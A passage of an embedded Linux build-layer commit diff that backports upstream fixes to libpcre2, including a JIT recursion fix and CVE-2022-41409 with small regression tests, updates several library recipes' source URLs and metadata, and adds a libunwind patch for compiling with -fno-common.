+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 1 + IMM2_SIZE;
+ break;
+@@ -2630,14 +2699,17 @@ while (cc < ccend)
+ switch(get_class_iterator_size(cc + i))
+ {
+ case 1:
+- private_count = 1;
+ private_srcw[0] = PRIVATE_DATA(cc);
+ break;
+
+ case 2:
+- private_count = 2;
+ private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ if (recurse_check_bit(common, private_srcw[0]))
++ {
++ private_count = 2;
++ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
++ }
+ break;
+
+ default:
+@@ -2652,28 +2724,25 @@ while (cc < ccend)
+ case OP_PRUNE_ARG:
+ case OP_THEN_ARG:
+ SLJIT_ASSERT(common->mark_ptr != 0);
+- if (has_quit && !setmark_found)
++ if (has_quit && recurse_check_bit(common, common->mark_ptr))
+ {
+ kept_shared_srcw[0] = common->mark_ptr;
+ kept_shared_count = 1;
+- setmark_found = TRUE;
+ }
+- if (common->control_head_ptr != 0 && !control_head_found)
++ if (common->control_head_ptr != 0 && recurse_check_bit(common, common->control_head_ptr))
+ {
+ shared_srcw[0] = common->control_head_ptr;
+ shared_count = 1;
+- control_head_found = TRUE;
+ }
+ cc += 1 + 2 + cc[1];
+ break;
+
+ case OP_THEN:
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+- if (!control_head_found)
++ if (recurse_check_bit(common, common->control_head_ptr))
+ {
+ shared_srcw[0] = common->control_head_ptr;
+ shared_count = 1;
+- control_head_found = TRUE;
+ }
+ cc++;
+ break;
+@@ -2681,7 +2750,7 @@ while (cc < ccend)
+ default:
+ cc = next_opcode(common, cc);
+ SLJIT_ASSERT(cc != NULL);
+- break;
++ continue;
+ }
+
+ if (type != recurse_copy_shared_to_global && type != recurse_copy_kept_shared_to_global)
+@@ -13262,7 +13331,7 @@ SLJIT_ASSERT(!(common->req_char_ptr != 0 && common->start_used_ptr != 0));
+ common->cbra_ptr = OVECTOR_START + (re->top_bracket + 1) * 2 * sizeof(sljit_sw);
+
+ total_length = ccend - common->start;
+-common->private_data_ptrs = (sljit_s32 *)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
++common->private_data_ptrs = (sljit_s32*)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
+ if (!common->private_data_ptrs)
+ {
+ SLJIT_FREE(common->optimized_cbracket, allocator_data);
+@@ -13304,6 +13373,7 @@ if (!compiler)
+ common->compiler = compiler;
+
+ /* Main pcre_jit_exec entry. */
++SLJIT_ASSERT((private_data_size & (sizeof(sljit_sw) - 1)) == 0);
+ sljit_emit_enter(compiler, 0, SLJIT_ARG1(SW), 5, 5, 0, 0, private_data_size);
+
+ /* Register init. */
+@@ -13524,20 +13594,40 @@ common->fast_fail_end_ptr = 0;
+ common->currententry = common->entries;
+ common->local_quit_available = TRUE;
+ quit_label = common->quit_label;
+-while (common->currententry != NULL)
++if (common->currententry != NULL)
+ {
+- /* Might add new entries. */
+- compile_recurse(common);
+- if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
++ /* A free bit for each private data. */
++ common->recurse_bitset_size = ((private_data_size / (int)sizeof(sljit_sw)) + 7) >> 3;
++ SLJIT_ASSERT(common->recurse_bitset_size > 0);
++ common->recurse_bitset = (sljit_u8*)SLJIT_MALLOC(common->recurse_bitset_size, allocator_data);;
++
++ if (common->recurse_bitset != NULL)
++ {
++ do
++ {
++ /* Might add new entries. */
++ compile_recurse(common);
++ if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
++ break;
++ flush_stubs(common);
++ common->currententry = common->currententry->next;
++ }
++ while (common->currententry != NULL);
++
++ SLJIT_FREE(common->recurse_bitset, allocator_data);
++ }
++
++ if (common->currententry != NULL)
+ {
++ /* The common->recurse_bitset has been freed. */
++ SLJIT_ASSERT(sljit_get_compiler_error(compiler) || common->recurse_bitset == NULL);
++
+ sljit_free_compiler(compiler);
+ SLJIT_FREE(common->optimized_cbracket, allocator_data);
+ SLJIT_FREE(common->private_data_ptrs, allocator_data);
+ PRIV(jit_free_rodata)(common->read_only_data_head, allocator_data);
+ return PCRE2_ERROR_NOMEMORY;
+ }
+- flush_stubs(common);
+- common->currententry = common->currententry->next;
+ }
+ common->local_quit_available = FALSE;
+ common->quit_label = quit_label;
+diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
+index 9df87fd..2f84834 100644
+--- a/src/pcre2_jit_test.c
++++ b/src/pcre2_jit_test.c
+@@ -746,6 +746,7 @@ static struct regression_test_case regression_test_cases[] = {
+ { MU, A, 0, 0, "((?(R)a|(?1)){1,3}?)M", "aaaM" },
+ { MU, A, 0, 0, "((.)(?:.|\\2(?1))){0}#(?1)#", "#aabbccdde# #aabbccddee#" },
+ { MU, A, 0, 0, "((.)(?:\\2|\\2{4}b)){0}#(?:(?1))+#", "#aaaab# #aaaaab#" },
++ { MU, A, 0, 0 | F_NOMATCH, "(?1)$((.|\\2xx){1,2})", "abc" },
+
+ /* 16 bit specific tests. */
+ { CM, A, 0, 0 | F_FORCECONV, "\xc3\xa1", "\xc3\x81\xc3\xa1" },
+--
+2.25.1
+
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
new file mode 100644
index 0000000000..882277ae73
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
@@ -0,0 +1,74 @@
+From 94e1c001761373b7d9450768aa15d04c25547a35 Mon Sep 17 00:00:00 2001
+From: Philip Hazel <Philip.Hazel@gmail.com>
+Date: Tue, 16 Aug 2022 17:00:45 +0100
+Subject: [PATCH] Diagnose negative repeat value in pcre2test subject line
+
+CVE: CVE-2022-41409
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ ChangeLog | 3 +++
+ src/pcre2test.c | 4 ++--
+ testdata/testinput2 | 3 +++
+ testdata/testoutput2 | 4 ++++
+ 4 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index eab50eb7..276eb57a 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -7,6 +7,9 @@ fully read in caseless matching.
+ 24. Fixed an issue affecting recursions in JIT caused by duplicated data
+ transfers.
+
++20. A negative repeat value in a pcre2test subject line was not being
++diagnosed, leading to infinite looping.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2test.c b/src/pcre2test.c
+index 08f86096..f6f5d66c 100644
+--- a/src/pcre2test.c
++++ b/src/pcre2test.c
+@@ -6700,9 +6700,9 @@ while ((c = *p++) != 0)
+ }
+
+ i = (int32_t)li;
+- if (i-- == 0)
++ if (i-- <= 0)
+ {
+- fprintf(outfile, "** Zero repeat not allowed\n");
++ fprintf(outfile, "** Zero or negative repeat not allowed\n");
+ return PR_OK;
+ }
+
+diff --git a/testdata/testinput2 b/testdata/testinput2
+index 655e519..14e00ed 100644
+--- a/testdata/testinput2
++++ b/testdata/testinput2
+@@ -5772,4 +5772,7 @@ a)"xI
+ /(a)?a/I
+ manm
+
++--
++ \[X]{-10}
++
+ # End of testinput2
+diff --git a/testdata/testoutput2 b/testdata/testoutput2
+index c733c12..958f246 100644
+--- a/testdata/testoutput2
++++ b/testdata/testoutput2
+@@ -17435,6 +17435,10 @@ Subject length lower bound = 1
+ manm
+ 0: a
+
++--
++ \[X]{-10}
++** Zero or negative repeat not allowed
++
+ # End of testinput2
+ Error -70: PCRE2_ERROR_BADDATA (unknown error number)
+ Error -62: bad serialized data
diff --git a/meta/recipes-support/libpcre/libpcre2_10.34.bb b/meta/recipes-support/libpcre/libpcre2_10.34.bb
index fa8655e027..53277270d2 100644
--- a/meta/recipes-support/libpcre/libpcre2_10.34.bb
+++ b/meta/recipes-support/libpcre/libpcre2_10.34.bb
@@ -10,8 +10,12 @@ SECTION = "devel"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37"
-SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre2-${PV}.tar.bz2 \
+SRC_URI = "http://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \
file://pcre-cross.patch \
+ file://CVE-2022-1586.patch \
+ file://CVE-2022-1586-regression.patch \
+ file://CVE-2022-1587.patch \
+ file://CVE-2022-41409.patch \
"
SRC_URI[md5sum] = "d280b62ded13f9ccf2fac16ee5286366"
diff --git a/meta/recipes-support/libpcre/libpcre_8.44.bb b/meta/recipes-support/libpcre/libpcre_8.44.bb
index e5471e81da..3267c5ad72 100644
--- a/meta/recipes-support/libpcre/libpcre_8.44.bb
+++ b/meta/recipes-support/libpcre/libpcre_8.44.bb
@@ -7,8 +7,7 @@ HOMEPAGE = "http://www.pcre.org"
SECTION = "devel"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e"
-SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre-${PV}.tar.bz2 \
- file://fix-pcre-name-collision.patch \
+SRC_URI = "${SOURCEFORGE_MIRROR}/pcre/pcre-${PV}.tar.bz2 \
file://run-ptest \
file://Makefile \
"
diff --git a/meta/recipes-support/libproxy/libproxy_0.4.15.bb b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
index 6f704d7a91..6c7d5a68a1 100644
--- a/meta/recipes-support/libproxy/libproxy_0.4.15.bb
+++ b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
@@ -1,4 +1,8 @@
SUMMARY = "Library providing automatic proxy configuration management"
+DESCRIPTION = "libproxy provides interfaces to get the proxy that will be \
+used to access network resources. It uses various plugins to get proxy \
+configuration via different mechanisms (e.g. environment variables or \
+desktop settings)."
HOMEPAGE = "https://github.com/libproxy/libproxy"
BUGTRACKER = "https://github.com/libproxy/libproxy/issues"
SECTION = "libs"
diff --git a/meta/recipes-support/libpsl/libpsl_0.21.0.bb b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
index 9831b4b94f..66e64f785c 100644
--- a/meta/recipes-support/libpsl/libpsl_0.21.0.bb
+++ b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
@@ -1,4 +1,10 @@
SUMMARY = "Public Suffix List library"
+DESCRIPTION = "The libpsl package provides a library for accessing and \
+resolving information from the Public Suffix List (PSL). The PSL is a set of \
+domain names beyond the standard suffixes, such as .com."
+
+HOMEPAGE = "https://rockdaboot.github.io/libpsl/"
+BUGTRACKER = "https://github.com/rockdaboot/libpsl/issues"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=5437030d9e4fbe7267ced058ddb8a7f5 \
@@ -13,11 +19,10 @@ SRC_URI[sha256sum] = "41bd1c75a375b85c337b59783f5deb93dbb443fb0a52d257f403df7bd6
UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases"
-DEPENDS = "libidn2"
-
inherit autotools gettext gtk-doc manpages pkgconfig lib_package
-PACKAGECONFIG ??= ""
+PACKAGECONFIG ?= "idn2"
PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native"
-
+PACKAGECONFIG[icu] = "--enable-runtime=libicu --enable-builtin=libicu,,icu"
+PACKAGECONFIG[idn2] = "--enable-runtime=libidn2 --enable-builtin=libidn2,,libidn2 libunistring"
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
index 6731b3373e..e42ac30bf2 100644
--- a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
+++ b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
@@ -1,11 +1,13 @@
SUMMARY = "An HTTP library implementation in C"
+DESCRIPTION = "libsoup is an HTTP client/server library for GNOME. It uses GObjects \
+and the glib main loop, to integrate well with GNOME applications."
HOMEPAGE = "https://wiki.gnome.org/Projects/libsoup"
BUGTRACKER = "https://bugzilla.gnome.org/"
SECTION = "x11/gnome/libs"
LICENSE = "LGPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2"
-DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 intltool-native libpsl"
+DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 libpsl"
SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}"
@@ -40,4 +42,4 @@ DEBIAN_NOAUTONAME_${PN} = "1"
# glib-networking is needed for SSL, proxies, etc.
RRECOMMENDS_${PN} = "glib-networking"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/libunistring/libunistring_0.9.10.bb b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
index 97fac4ecfa..2197b6656d 100644
--- a/meta/recipes-support/libunistring/libunistring_0.9.10.bb
+++ b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
@@ -18,6 +18,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=6a6a8e020838b23406c81b19c1d46df6 \
file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \
file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \
"
+DEPENDS = "gperf-native"
SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \
file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \
diff --git a/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
new file mode 100644
index 0000000000..34a1f46b0f
--- /dev/null
+++ b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
@@ -0,0 +1,420 @@
+From 51112447b316813ad1ae50ea66feca4eb755a424 Mon Sep 17 00:00:00 2001
+From: Yichao Yu <yyc1992@gmail.com>
+Date: Tue, 31 Mar 2020 00:43:32 -0400
+Subject: [PATCH] Fix compilation with -fno-common.
+
+[Khem Raj]
+Making all other archs consistent with IA64 which should not have this problem.
+Also move the FIXME to the correct place.
+
+Also add some minimum comments about this...
+
+[Philippe Coval]
+
+Patch ported to v1.3-stable branch,
+patch to be used in openembedded-core dunfell branch (on v1.3.1)
+for oniro project.
+
+Upstream-Status: Backport [https://github.com/libunwind/libunwind/pull/166]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Thanks-to: Yichao Yu <yyc1992@gmail.com>
+Origin: https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e
+Relate-to: https://booting.oniroproject.org/distro/oniro/-/issues/191
+Forwarded: https://github.com/libunwind/libunwind/pull/312
+Last-Update: 2021-11-25
+Signed-off-by: Philippe Coval <philippe.coval@huawei.com>
+---
+ src/aarch64/Ginit.c | 15 +++++++--------
+ src/arm/Ginit.c | 15 +++++++--------
+ src/coredump/_UPT_get_dyn_info_list_addr.c | 5 +++++
+ src/hppa/Ginit.c | 15 +++++++--------
+ src/ia64/Ginit.c | 1 +
+ src/mi/Gfind_dynamic_proc_info.c | 1 +
+ src/mips/Ginit.c | 15 +++++++--------
+ src/ppc32/Ginit.c | 11 +++++++----
+ src/ppc64/Ginit.c | 11 +++++++----
+ src/ptrace/_UPT_get_dyn_info_list_addr.c | 5 +++++
+ src/sh/Ginit.c | 15 +++++++--------
+ src/tilegx/Ginit.c | 15 +++++++--------
+ src/x86/Ginit.c | 15 +++++++--------
+ src/x86_64/Ginit.c | 15 +++++++--------
+ 14 files changed, 82 insertions(+), 72 deletions(-)
+
+diff --git a/src/aarch64/Ginit.c b/src/aarch64/Ginit.c
+index 9c4eae82..cb954b15 100644
+--- a/src/aarch64/Ginit.c
++++ b/src/aarch64/Ginit.c
+@@ -61,13 +61,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -78,7 +71,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/arm/Ginit.c b/src/arm/Ginit.c
+index 2720d063..0bac0d72 100644
+--- a/src/arm/Ginit.c
++++ b/src/arm/Ginit.c
+@@ -57,18 +57,17 @@ tdep_uc_addr (unw_tdep_context_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/coredump/_UPT_get_dyn_info_list_addr.c b/src/coredump/_UPT_get_dyn_info_list_addr.c
+index 0d119055..739ed056 100644
+--- a/src/coredump/_UPT_get_dyn_info_list_addr.c
++++ b/src/coredump/_UPT_get_dyn_info_list_addr.c
+@@ -74,6 +74,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+
+ #else
+
++/* XXX fix me: there is currently no way to locate the dyn-info list
++ by a remote unwinder. On ia64, this is done via a special
++ unwind-table entry. Perhaps something similar can be done with
++ DWARF2 unwind info. */
++
+ static inline int
+ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+ int *countp)
+diff --git a/src/hppa/Ginit.c b/src/hppa/Ginit.c
+index 461e4b93..265455a6 100644
+--- a/src/hppa/Ginit.c
++++ b/src/hppa/Ginit.c
+@@ -64,13 +64,6 @@ _Uhppa_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -81,7 +74,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ia64/Ginit.c b/src/ia64/Ginit.c
+index b09a2ad5..8601bb3c 100644
+--- a/src/ia64/Ginit.c
++++ b/src/ia64/Ginit.c
+@@ -68,6 +68,7 @@ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ if (!_U_dyn_info_list_addr)
+ return -UNW_ENOINFO;
+ #endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+diff --git a/src/mi/Gfind_dynamic_proc_info.c b/src/mi/Gfind_dynamic_proc_info.c
+index 98d35012..2e7c62e5 100644
+--- a/src/mi/Gfind_dynamic_proc_info.c
++++ b/src/mi/Gfind_dynamic_proc_info.c
+@@ -49,6 +49,7 @@ local_find_proc_info (unw_addr_space_t as, unw_word_t ip, unw_proc_info_t *pi,
+ return -UNW_ENOINFO;
+ #endif
+
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
+ list = (unw_dyn_info_list_t *) (uintptr_t) _U_dyn_info_list_addr ();
+ for (di = list->first; di; di = di->next)
+ if (ip >= di->start_ip && ip < di->end_ip)
+diff --git a/src/mips/Ginit.c b/src/mips/Ginit.c
+index 3df170c7..bf7a8f5a 100644
+--- a/src/mips/Ginit.c
++++ b/src/mips/Ginit.c
+@@ -69,13 +69,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -86,7 +79,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ppc32/Ginit.c b/src/ppc32/Ginit.c
+index ba302448..7b454558 100644
+--- a/src/ppc32/Ginit.c
++++ b/src/ppc32/Ginit.c
+@@ -91,9 +91,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -104,7 +101,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ppc64/Ginit.c b/src/ppc64/Ginit.c
+index 4c88cd6e..7bfb395a 100644
+--- a/src/ppc64/Ginit.c
++++ b/src/ppc64/Ginit.c
+@@ -95,9 +95,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -108,7 +105,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ptrace/_UPT_get_dyn_info_list_addr.c b/src/ptrace/_UPT_get_dyn_info_list_addr.c
+index cc5ed044..16671d45 100644
+--- a/src/ptrace/_UPT_get_dyn_info_list_addr.c
++++ b/src/ptrace/_UPT_get_dyn_info_list_addr.c
+@@ -71,6 +71,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+
+ #else
+
++/* XXX fix me: there is currently no way to locate the dyn-info list
++ by a remote unwinder. On ia64, this is done via a special
++ unwind-table entry. Perhaps something similar can be done with
++ DWARF2 unwind info. */
++
+ static inline int
+ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+ int *countp)
+diff --git a/src/sh/Ginit.c b/src/sh/Ginit.c
+index 52988a72..9fe96d2b 100644
+--- a/src/sh/Ginit.c
++++ b/src/sh/Ginit.c
+@@ -58,13 +58,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -75,7 +68,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/tilegx/Ginit.c b/src/tilegx/Ginit.c
+index 7564a558..925e6413 100644
+--- a/src/tilegx/Ginit.c
++++ b/src/tilegx/Ginit.c
+@@ -64,13 +64,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -81,7 +74,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/x86/Ginit.c b/src/x86/Ginit.c
+index f6b8dc27..3cec74a2 100644
+--- a/src/x86/Ginit.c
++++ b/src/x86/Ginit.c
+@@ -54,13 +54,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -71,7 +64,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/x86_64/Ginit.c b/src/x86_64/Ginit.c
+index b7e8e462..fe6bcc33 100644
+--- a/src/x86_64/Ginit.c
++++ b/src/x86_64/Ginit.c
+@@ -49,13 +49,6 @@ static struct unw_addr_space local_addr_space;
+
+ unw_addr_space_t unw_local_addr_space = &local_addr_space;
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
